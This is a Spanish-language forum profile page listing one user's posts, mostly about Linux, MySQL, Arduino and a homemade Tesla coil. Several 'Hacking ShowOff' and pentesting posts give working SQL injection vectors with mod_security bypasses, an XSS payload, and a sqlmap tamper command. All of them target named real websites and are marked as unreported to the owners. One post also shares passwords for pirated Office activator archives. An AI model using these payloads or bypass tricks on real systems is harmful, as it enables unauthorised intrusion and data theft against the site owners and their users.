RREEDD
Yo no cambio a Ubuntu de mi pc por nada del mundo 
, comencé con el cuando conocí el linux y fue amor a primera vista jajajajSaludos Desde Chile
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#81
Debates, Reviews y Opiniones / Re:Que distro linux prefieres?
Marzo 19, 2016, 04:55:54 PM , comencé con el cuando conocí el linux y fue amor a primera vista jajajaj #82
Dudas y pedidos generales / Re:Generador de claves.
Marzo 18, 2016, 02:14:47 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me pregunta si en algun post que algun miebro haya hecho, hay un generador de claves.
No se comoexplicarlo pero les dejare un link.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso mismo pero en una aplicación para la pc.
Gracias.
Disculpe compañero @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , si entiendo bien lo que busca es un programa que le genere una contraseña segura para poner en su wifi o me equivoco, de no ser si le serviría el siguiente post. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Claro solo es cosa de agregarle o quitarle caracteres dependiendo del largo de la clave que quiera.
Saludos desde Chile
#83
Base de Datos / [VIDEO TUTORIAL] MySQL BASICO
Marzo 16, 2016, 08:50:24 PMRREEDD
Hola !!Les presento una serie de vídeos que hice sobre MYSQL, espero que se diviertan tanto viéndolos como yo al hacerlos.
Los grabe cuando recién estaba empezando a conocer SQL pero espero le sirvan a mas de alguien a salir de alguna duda.
- Instalación de MySQL en Ubuntu
- Crear base de datos,tablas y hacer insert
- Select anidados y funciones internas de MySQL
- Procedimientos de almacenado
- Trigger
- Respaldo y restauración
Cualquier consulta o sugerencia por favor no dudes en comentar
Saludos desde Chile
#84
Softwares e ISOs / Re:Microsoft Office 2013 [Esp] [Activadores] [32&64Bits]
Marzo 16, 2016, 11:59:18 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Se me olvidó poner la password del RAR.
Gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos!!
Muchas gracias a ti @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por compartir los link, justo estaba buscando el office y me tope con tu comentario, al descargarlo note que tenia clave así que la busque y la publique en antes de que alguien la pidiera
.Saludos desde Chile.
#85
Softwares e ISOs / Re:Microsoft Office 2013 [Esp] [Activadores] [32&64Bits]
Marzo 16, 2016, 11:42:47 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola compañeros.
La claves para descomprimir los archivos ISO es : ivenpaulito
la contraseña para descomprimir el activador es : iven
Link del video en youtube.
Saludos desde Chile
#86
Dudas y pedidos generales / Re:Duda Como Cambiar la Frecuencia de un Vehículo Radio-Control ??
Marzo 14, 2016, 11:44:51 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Excelente tu Aporte mi amigo, Gracias
Bueno lo que veo es que este que te enseño en la imagen es el que recibe la señal
y veo el post q me pasastes q dice que recibe varias frecuencias que se codifican para funcionar,
si es que es eso lo que entendi espero que sea asi???
verifica a ver amigo mio y de verdad gracias
Esa tiene que ser la bobina @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y no te preocupes estamos para ayudar y aprender entre todos.
Saludos desde Chile
#87
Dudas y pedidos generales / Re:Duda Como Cambiar la Frecuencia de un Vehículo Radio-Control ??
Marzo 14, 2016, 09:50:30 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
si se que ese es el cristal, y dice que es de 27 mhz, pero quiero saber cual es el cristal de la placa del carrito
Por favor corríjanme si me equivoco pero según entiendo solo el emisor utiliza el resonador de cristal de cuarzo para emitir la señal, en cambio el receptor tomas la señales y las filtra asi que no lo necesita.
Y sobre su consulta de poder usar el mando de otro auto con este vehículo, creo que seria posible si es que tiene un tornillo dentro el bobinado de la que esta en la placa, que sirva a modo de condensador variable, de otro modo no se me ocurre mas solución que seguir buscando otro control.
Saludos desde Chile
enlaces:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#88
Electrónica y Robótica / Les Presento mi Mini bobina Tesla Casera
Marzo 13, 2016, 01:41:36 AM
Hola!!
Les presento mi mini bobina tesla, la que construí junto con un amigo.
esta construida con materiales reciclados de algunos electrodomésticos que encontramos por ahí.
La bobina lleva el nombre de su inventor el gran Nicola Tesla, quien es es el responsable de la AC y de una gran cantidad de descubrimientos sin los cuales nuestro mundo moderno e informático seria técnicamente imposible.
Nikola creía fehacientemente en la energía libre y gratuita para todos, tiene muchos inventos en esa índole que fueron callados en sus tiempos por que iban contra los poderes fácticos.
Si quieren saber mas sobre Nikola Tesla o sus inventos les dejo unos links.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno manos a la obra, la bobina esta compuesta por 275 vueltas de un alambre delgado (lo saque de un trasformador de radio), el núcleo es de ferrita lo saque de la misma radio (estaba a forma de amplificador o quizás como filtro para la antena).
El transistor lo sacamos de una tele, junto con el condensador variable (lo usamos por que como no encontramos el transistor que salia en el circuito asi que jugamos la resistencia).
El circuito es el siguiente:
Yo use un transistor que resistiera un poco mas de potencia y le puse un disipador de calor.
Les dejo imágenes del funcionamiento de la bobina
Si tienes alguna consulta o sugerencia no dudes en comentar.
Saludos desde Chile
Les presento mi mini bobina tesla, la que construí junto con un amigo.
esta construida con materiales reciclados de algunos electrodomésticos que encontramos por ahí
.La bobina lleva el nombre de su inventor el gran Nicola Tesla, quien es es el responsable de la AC y de una gran cantidad de descubrimientos sin los cuales nuestro mundo moderno e informático seria técnicamente imposible.
Nikola creía fehacientemente en la energía libre y gratuita para todos, tiene muchos inventos en esa índole que fueron callados en sus tiempos por que iban contra los poderes fácticos.
Nikola Tesla
Si quieren saber mas sobre Nikola Tesla o sus inventos les dejo unos links.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno manos a la obra, la bobina esta compuesta por 275 vueltas de un alambre delgado (lo saque de un trasformador de radio), el núcleo es de ferrita lo saque de la misma radio (estaba a forma de amplificador o quizás como filtro para la antena).
El transistor lo sacamos de una tele, junto con el condensador variable (lo usamos por que como no encontramos el transistor que salia en el circuito asi que jugamos la resistencia).
El circuito es el siguiente:
Yo use un transistor que resistiera un poco mas de potencia y le puse un disipador de calor.
Les dejo imágenes del funcionamiento de la bobina
(El artilugio negro que sujeta la bobina, también lo saque de la radio este sostenía la ferrita de la antena )
Si tienes alguna consulta o sugerencia no dudes en comentar.
Saludos desde Chile
#89
Hacking ShowOff / [SQLi] http://www.cerir.com.ar
Marzo 12, 2016, 06:21:23 PMSitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descripción : Pagina de estudios políticos y relaciones exteriores de la Universidad de Rosario (Argentina)
[SQLi] Inyección en URL
Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: -1/*!50000UNION*//*!50000SELECT*/1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3--+
xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: NO
Autor: RREEDD
Cualquier duda o consulta no dudes en comentar
Saludos desde Chile
#90
Hacking ShowOff / Re:[SQLi] https://impulso.com.pe
Marzo 12, 2016, 01:43:27 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginHola compañero @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login imagen resubida
Muy bueno @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login la imagen está caida, puedes resubirla?
Gracias,
Un saludo!
. Saludos desde Chile
#91
Pentesting / Re:Evadir Mod_Security con Tampers de SQLMAP
Marzo 11, 2016, 08:40:46 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No es tan dificil evadir el mod security, solo basta un poco de imaginación, finalmente el mod security se basa en una blacklist sobre expreisones regulares, no es algo 100% fiable.
Por ejemplo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginCódigo: text <img width="365" height="64" src="images/categoria/5.5.42-37.1-log">
MySQL 5.5.42
El mod security te detecta todo lo que tenga "union select" y sus derivados como union all select, union/**/all/**/select o union%0a%0cselect, pero basta con quebrar la consulta uniendo comentarios mas saltos de linea: union -- %0a%0c select y listo, el motor interpretador de la base de datos interpretará union\nselect. Fuera de esto también te detecta select 1,1, pero no te detecta select '1','1'. Detecta ...'1',user(),'1'... pero no detecta ...'1',(user()),'1'... , por ejemplo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginCódigo: text <img width="365" height="64" src="images/categoria/micronic_base@localhost">
micronic_base@localhost
Finalmente datos que te pueden servir para leer el usuario y contraseña o hash de acceso para paginas como esta:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Por esto por lo general prefiero no utilizar sqlmap porque en muchos caso te encuentras con mucha ofuscación, si no es el mod security es el waf, el firewall o el ids, vas sacando las inyecciones en el camino y vas sorteando los filtros a medida que van apareciendo.
Al final la persona siempre será mas hábil que una maquina, por eso no me gusta dejarle el trabajo a un software.
Gracias @WHK por comenta y ahora lo hice sin SQLMAP de forma manual You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#92
Hacking ShowOff / [SQLi] https://impulso.com.pe
Marzo 11, 2016, 08:30:58 PM
Sitio : You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Descripción Del Sitio : Venta de artículos electrónicos en Perú.
Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba.
Cualquier duda o sugerencia por favor no dudes en comentar.
Saludos desde Chile
Descripción Del Sitio : Venta de artículos electrónicos en Perú.
Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba
.- [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50
xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: NO
Autor: RREEDD
Cualquier duda o sugerencia por favor no dudes en comentar.
Saludos desde Chile
#93
Arduino - Raspberry PI / Smartphone como monitor Serial de Arduino
Marzo 10, 2016, 12:38:05 AMRREEDD
Hola!!!
Compañeros, hoy les explicare como usar el celular como monitor Serial de Arduino y así no tendremos que conectarlo al PC para saber que es lo que esta pasando en las entrañas de nuestra placa
.Para lograr la conexión necesitamos los siguiente.
- Que nuestro teléfono sea compatible con "USB On-The-Go", lo que según Wikipedia seria:
CitarUSB On-The-Gonota 1 conocido también por el acrónimo USB OTG y como USB hostnota 2 es una extensión de la norma USB 2.0 que permite a los dispositivos USB tener mayor flexibilidad en la gestión de la interconexión.
Permite que ciertos dispositivos, por ejemplo: reproductor de audio digital o teléfono móvil, actúen como host, por lo que se les puede conectar una memoria USB, un ratón, un teclado, un disco duro, un módem, etc.Para mas información. - Tener un cable de USB a MicroUSB (depende de la entrada de tu terminal)
- Descargar esta aplicación para Crear la conexión Serial desde el Smartphone a Arduino
LINK : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
EJEMPLO
Primero Con Un LCD para ver la comunicación serial en tiempo real
// Importa las librerias
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Libreria que controla la pantalla LCD
LiquidCrystal_I2C lcd(0x27, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE); // Inicializa el LCD
int cont; // contador que enviaremos con Serial
/*
Para descargar la libreria LiquidCrystal_I2C.h.
https://bitbucket.org/fmalpartida/new-liquidcrystal/downloads/LiquidCrystal_V1.2.1.zip
_________________
|d13 D12|
|3v3 D11|
|REF D10|
|A0 Arduino D9|
|A1 NANO D8|
|A2 D7|
|A3 D6|
SDA (lcd) |A4 D5|
SCL (lcd) |A5 D4|
|A6 D3|
|A7 D2|
VCC (lcd) |5v GND|
|RST RST|
GND (lcd) |GND TR|
|VIN TX|
|_______________|
*/
void setup() {
lcd.begin(16,2); // Se introduce el tamaño de nuestro LCD
Serial.begin(9600); // Establecemos la comunicacion Serial a 9600 baud
cont =0;
}
void loop() {
lcd.clear(); // Limpia la pantalla
lcd.setCursor(0,0); // Establece la ubicacion
lcd.print("underc0de"); // mensaje
lcd.setCursor(0,1); // Establece la ubicacion
lcd.print("Contador"); // mensaje
lcd.setCursor(12,1); // Establece la ubicacion
lcd.print(cont); // mensaje
delay (1000); // establece una espera en el codigo
String mensaje="underc0de Contador: "; // establece el mensaje
Serial.print(mensaje); // mensaje por Serial
Serial.println(cont); // mensaje por Serial
cont = cont + 1 ;
}
Ahora veremos la comunicación Serial sin el LCD
int cont; // contador que enviaremos con Serial
void setup() {
Serial.begin(9600); // Establecemos la comunicacion Serial a 9600 baud
cont =0;
}
void loop() {
delay (1000); // establece una espera en el codigo
String mensaje="underc0de Contador: "; // establece el mensaje
Serial.print(mensaje); // mensaje por Serial
Serial.println(cont); // mensaje por Serial
cont = cont + 1 ;
}
Espero que les sirva y para sus proyectos y cualquier duda por favor comenten.
Saludos desde Chile.
#94
Off Topic / Re:Hola comparte tus experiencias
Marzo 08, 2016, 10:55:10 PMRREEDD
Hola!!Muchas gracias a todos por publicar sus experiencias, yo empecé con esto de la seguridad informática desde hace unos 5 años , me gusto tanto que estudie informática y descubrí que era mi pasión.
Al igual que todos al principio era bastante lamer solo queriendo entrar y tomar todo lo que encontraba, usaba herramientas que venían con legiones de virus las cuales envés de darme el control del sistema daban el control del mio
, pero eso me ayudo para dejar de pensar que una herramienta era la panacea y teniendo que estudiar, aprendiendo como era que las cosas funcionaban y una ves que logras entenderlo tu mundo cambia para siempre y te das cuenta que las cosas aquellas que en un principio parecía imposible de descifrar, se hace claras y casi obvias .Bueno me despido agradeciendo a todos por pasar por mi post.
Saludos desde Chile
#95
Diseño UX/UI / Re:Pide tu firma Underc0de V3.
Marzo 06, 2016, 10:42:16 PM #96
Hacking ShowOff / Re:[XSS, SQLi] www.abogadosrosarinos.com
Marzo 06, 2016, 08:31:45 PMRREEDD
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Perfecto @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ! así tienen que ser los reportes en "Hacking show off" con el payload explotando la falla.
Saludos!, EPSILON.
Gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, quería reivindicarme con mis siguientes post
.Saludos desde Chile
#97
Pentesting / Evadir Mod_Security con Tampers de SQLMAP
Marzo 06, 2016, 05:00:43 PMRREEDD
Hola !!
como a todos nos habrá pasado alguna vez que intentas hacer una inyección por GET en una pagina y aparece
aparece el famoso anuncio de Mod_Security que no deja inyectar.
Pero si creíste que con eso se acababa el juego estas muy equivocado, siempre estará SQLMAP al rescate con sus 47 Tampers (que son los que vienen por defecto en la ultima versión ) los cuales te sacaran de mas de un apuro
.Para este ejemplo usaremos "modsecurityversioned.py" (el cual solo funciona con MySQL).
Si quieres mas información sobre cada uno tienes que ir a sqlmap/tamper/, donde encontraras todos los disponibles y dentro de cada archivo existe una explicación de su funcionalidad
Para usar un Tamper en SQLMAP es muy simple solo se le debe agregar la opción
--tamper [nombre del tamper]El ejemplo de inyección lo haremos con una pagina Peruana de venta de artículos electrónicos (espero no les moleste)
.URL :You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Herramienta : SQLMAP Tamper : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xploit :
sqlmap.py -u "https://impulso.com.pe/detalle_marca.php?marca_id=24&cat_id=5" --dbms "MySQL" -p "marca_id" --tamper "modsecurityzeroversioned.py" --batch RESULTADO
REPORTADO : NO
Saludos desde Chile
#98
Hacking ShowOff / [XSS, SQLi] www.abogadosrosarinos.com
Marzo 06, 2016, 01:54:13 PMRREEDD
Sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descripción del sitio : Pagina para contratar Abogados en Argentina
Hola!!!
- [SQLi] Inyección en URL .
Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: NO
Autor: RREEDD - [XSS] Inyección en URL
Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: <script>prompt('underc0de','rreedd');</script>
xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: NO
Autor: RREEDD
Espero les guste y cualquier reparo o consulta por favor no dudes en postear
Saludos desde Chile
#99
Hacking ShowOff / Re:[SQLi , XSS] www.fepal.net
Marzo 06, 2016, 12:05:45 PMRREEDD
Hola!!You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginGracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.
Saludos, EPSILON.
Muchas gracias a todos por comentar.
Saludos desde Chile.
#100
Arduino - Raspberry PI / Re:Les Presento Mi Auto Controlado Por Bluetooth
Marzo 06, 2016, 12:40:30 AMRREEDD
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Estupendo trabajo!!
Te felicito y agradezco que lo compartieras con nosotros!
Te dejo coins
Saludos.
Gabriela
muchas gracias, me gusta mucho esta comunidad, así que pronto estaré haciendo mas post.
Saludos desde chile.
